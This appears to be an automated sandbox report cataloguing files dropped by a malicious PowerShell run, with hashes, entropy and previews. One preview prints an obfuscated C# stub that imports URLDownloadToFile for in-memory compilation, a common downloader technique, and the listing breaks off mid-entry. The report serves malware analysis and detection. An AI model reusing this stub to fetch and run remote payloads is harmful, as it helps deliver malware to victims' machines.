                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Oct 30 07:04:48 2024, 1st section name ".debug$S"
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1328
                                                                                                  Entropy (8bit):4.002689547958287
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:H+e9EurAdH3wKdNWI+ycuZhN3YakSkNPNnqSqd:rrIgKd41ul3Ya3kXqSK
                                                                                                  MD5:4E3A1CA2A3AEF7EF627F8C3DA297D779
                                                                                                  SHA1:408282ABD742035F6CD156644A8EC359763E5397
                                                                                                  SHA-256:E7638BC0CA628633233740166AD68E74885854474B40F05F2D8D2F5FA6119599
                                                                                                  SHA-512:0D15EE58CFD67F365A5A6830EC87A627786255D8BF1C1AE886CE478D513265986EF873760D361B25604F095D8A3CCC93D72FABF9E872591BFD16448E9E3835D1
                                                                                                  Malicious:false
                                                                                                  Preview:L.....!g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP...................r.&.Uv1S.%...........4.......C:\Users\user\AppData\Local\Temp\RESB606.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.k.3.w.n.0.w.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                  C:\Users\user\AppData\Local\Temp\aaqqimnx.p3r.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:MSVC .res
                                                                                                  Category:dropped
                                                                                                  Size (bytes):652
                                                                                                  Entropy (8bit):3.0908695751726234
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryIak7YnqquPN5Dlq5J:+RI+ycuZhNGakSuPNnqX
                                                                                                  MD5:EDAFB79C74F69E992C682FD6207C854D
                                                                                                  SHA1:19AE955266D4CCE511220DDFB7B9E623346AC822
                                                                                                  SHA-256:3D16A25B8A497F0F182E60486F4F33E16C1F677D93BDF5492B0BE66A32258166
                                                                                                  SHA-512:167B68E63C56A888D3D5871F34D34182F51CB7F3AA37E92F444C2DF20DABBBFB82202991311BF4C0687F66BDD3EF9CC03CBABF0C5368B15E5BF13F2A34A4D71C
                                                                                                  Malicious:false
                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.r.i.j.5.b.t.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.r.i.j.5.b.t.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                  C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.0.cs

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (365)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):487
                                                                                                  Entropy (8bit):3.9164065819276854
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:V/DsYLDS81zuy8GmMelQXReKJ8SRHy4Hbc98eceOCpPG7y:V/DTLDfu0XfH/veEy
                                                                                                  MD5:8165DF8B1B6D49C15B5E65811DE25B8C
                                                                                                  SHA1:FBE4FE188254B23C8B57B8D1BCD56011A93F34BA
                                                                                                  SHA-256:063172FF26517CDF762B144B713C24D423F75C6493234773C0E241C060DFA9F9
                                                                                                  SHA-512:EDE5171453ECE61E25BAF3EEF0A842E92A2B2C47C06BD4ED416F9C0A42E2BBC29F1810B97E4041DCDFD53995FC0E268F20A39188DB553CF272B0374994473A2D
                                                                                                  Malicious:false
                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace tqOdYPQP.{. public class wNvmpLfFZv. {. [DllImport("URLMon.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr kGDCOyAEvH,string wq,string fHnJOOAgaL,uint fcLWBnX,IntPtr bKg);.. }..}.

                                                                                                  C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):369
                                                                                                  Entropy (8bit):5.210210147459645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f6QGQwzxs7+AEszIP23f6QGQ39:p37Lvkmb6KzjHwWZEojHt
                                                                                                  MD5:C504BC8817988FAFD5E47089BB92FFD7
                                                                                                  SHA1:EDAAFA4D0E23611F9D2F45BDD5C0EC6933F94BC1
                                                                                                  SHA-256:4CF1AEE8FC77F65DEDCBDC2097431ECD3F34C48CD71066C53A4A06775DACE0FE
                                                                                                  SHA-512:ADCD89B345B3FB65807AFA31D998A8DC8715347DC433A36CB1F37971AA69259BEDC5AD40B78B5BAC1CA37BA1E159B1E3C1831710034F1E2D166B2A0E9A5DDF6E
                                                                                                  Malicious:true
                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.0.cs"

                                                                                                  C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.dll

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3072
                                                                                                  Entropy (8bit):2.8645463382547964
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:etGS6peYYLPl78ex0WkDbt0zEtkZfsn3jTyAFWI+ycuZhNGakSuPNnq:6RYwPlIe+np2bJs3j+91ulGa3yq
                                                                                                  MD5:1A181983D78CE1443EC651794B24F2A3
                                                                                                  SHA1:ACC293CEE0EDFC1709D2CE69DBFFC6E8372CA386
                                                                                                  SHA-256:D94E88D10708825E46ADFAAE87B65A4F002B10F271EEA7BDC37890AAD8E679D5
                                                                                                  SHA-512:F996FD392C48B14D8934B6D3DDF82A91517BA3270814D8CFA57B21D787E90044B47071D84215858DFB9BB16F5020EDD9423597B3930865578E3978DBD298D3CA
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.!g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.......................................".............. B.....P ......T.........Z.....e.....h.....s.....{...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.br

                                                                                                  C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.out

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):866
                                                                                                  Entropy (8bit):5.336488224569612
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:AId3ka6KzjREojIKaMD5DqBVKVrdFAMBJTH:Akka60jREojIKdDcVKdBJj
                                                                                                  MD5:1BDA980899EEA76CB6CE35E151031DF8
                                                                                                  SHA1:28E04988A5BD5BFB259070B49C50AC2755A9FAD4
                                                                                                  SHA-256:70117B6AD2E545DFA1004C509C7A09A96B428765A737FB1C26C1052E1490518F
                                                                                                  SHA-512:6BF47378B3BC739A54BCE49CB2462128EED147463D17F46A4D5B28311B8BB34EFF059AB08B4795993C1FD103A7261C33A007B501C81FDBA8E2129D29E0686DB2
                                                                                                  Malicious:false
                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                  C:\Users\user\AppData\Local\Temp\bz1sjskr.t5w.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\cagifsfd.5zd.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\cynizplk.4hj.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\j35azjfg.00i.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\j5ek5idr.dhu.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:MSVC .res
                                                                                                  Category:dropped
                                                                                                  Size (bytes):652
                                                                                                  Entropy (8bit):3.1073862953986744
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFYak7YnqqkNPN5Dlq5J:+RI+ycuZhN3YakSkNPNnqX
                                                                                                  MD5:B6DEBFFC72CBA726F655763153B1251E
                                                                                                  SHA1:A0D5798EF04F53A26053D91C549E68CB8ABACFBC
                                                                                                  SHA-256:A9EBF62DD9473CC44C74BCF3212158450DACFDB0BF2A0286CCD408452534879F
                                                                                                  SHA-512:BF8CF76569C0F529185C89D05609D87C46D5F3F9DE2D096C6D96B2EA89D405642B403762321CBDB04490A2C655C72BF89BD61FF264EAD7059DF6BBE395D1C205
                                                                                                  Malicious:false
                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.k.3.w.n.0.w.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.k.3.w.n.0.w.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                  C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.0.cs

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (365)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):487
                                                                                                  Entropy (8bit):3.9164065819276854
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:V/DsYLDS81zuy8GmMelQXReKJ8SRHy4Hbc98eceOCpPG7y:V/DTLDfu0XfH/veEy
                                                                                                  MD5:8165DF8B1B6D49C15B5E65811DE25B8C
                                                                                                  SHA1:FBE4FE188254B23C8B57B8D1BCD56011A93F34BA
                                                                                                  SHA-256:063172FF26517CDF762B144B713C24D423F75C6493234773C0E241C060DFA9F9
                                                                                                  SHA-512:EDE5171453ECE61E25BAF3EEF0A842E92A2B2C47C06BD4ED416F9C0A42E2BBC29F1810B97E4041DCDFD53995FC0E268F20A39188DB553CF272B0374994473A2D
                                                                                                  Malicious:false
                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace tqOdYPQP.{. public class wNvmpLfFZv. {. [DllImport("URLMon.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr kGDCOyAEvH,string wq,string fHnJOOAgaL,uint fcLWBnX,IntPtr bKg);.. }..}.

                                                                                                  C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):369
                                                                                                  Entropy (8bit):5.266146541156481
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fyDEUzxs7+AEszIP23fyDi:p37Lvkmb6KzfUWZEoZ
                                                                                                  MD5:D9AAF3BD566A13AB3D3C7C92E620FDE9
                                                                                                  SHA1:CA588C90C527D7B36E1A81DB44C81208C7B6388D
                                                                                                  SHA-256:47B63A0833F457A0A9C1C6A07C252CDE20E8A4A23E3BCDAA9CE298237B643914
                                                                                                  SHA-512:FB5B799CE5424E5C1E7212CF5D4D12E881E375EAA56A08EF5BEC1A0681E4A7560B1F19CEBD8A39C8C47C3C9BDE11B3C210549F3E6BF07060F85F724042B0D29E
                                                                                                  Malicious:false
                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.0.cs"

                                                                                                  C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.dll

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3072
                                                                                                  Entropy (8bit):2.8667597857721963
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:etGSopeYYLPl78ex0WkD/0zEtkZfunTyAFWI+ycuZhN3YakSkNPNnq:6XYwPlIe+n/2bJun+91ul3Ya3kXq
                                                                                                  MD5:14C413F5704B33903B2CD035BC649A1C
                                                                                                  SHA1:AA91DA3FA6CDE25978F54B54F938716D94690ADF
                                                                                                  SHA-256:C5CC08D8223F6405ED6456F45A702AA5B8076218D0D34CA167D6D7834A34AA34
                                                                                                  SHA-512:780C9E39E74AA69D0053115C07AD0F9277BE3F9CF540156F8B64A27C820805CCC834EE8D5F69D25DB9E962714C73266EA22F0427E0841717C63D9C21A4CC17E4
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.......................................".............. B.....P ......T.........Z.....e.....h.....s.....{...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.jk

                                                                                                  C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.out

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):866
                                                                                                  Entropy (8bit):5.34865997799165
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:AId3ka6KztEocKaMD5DqBVKVrdFAMBJTH:Akka60tEocKdDcVKdBJj
                                                                                                  MD5:D5EEAC246DA90F67F203C6E89E6B12A6
                                                                                                  SHA1:DABC6088D4582BF457D4CEC29D2243D34E474BFD
                                                                                                  SHA-256:313F8DE4C305474911A48CADE24B09ABFD9650B2A33DC56BDF52DC46A399A709
                                                                                                  SHA-512:2DB09339804F59CA1E4068F86142D6A0B1812186B2B31FD0E1B725E334B2F29A44FBDA899A94318B2A51CB5D81EE55B01C24A98104E061E5EA80926DB9396C6D
                                                                                                  Malicious:false
                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                  C:\Users\user\AppData\Local\Temp\rxk2gs22.1p5.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\th4y05jw.bn1.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\u53xnmlj.jkn.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\vkowvdh4.2xc.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\wx50fivm.4e5.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\xuxauuls.f1s.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
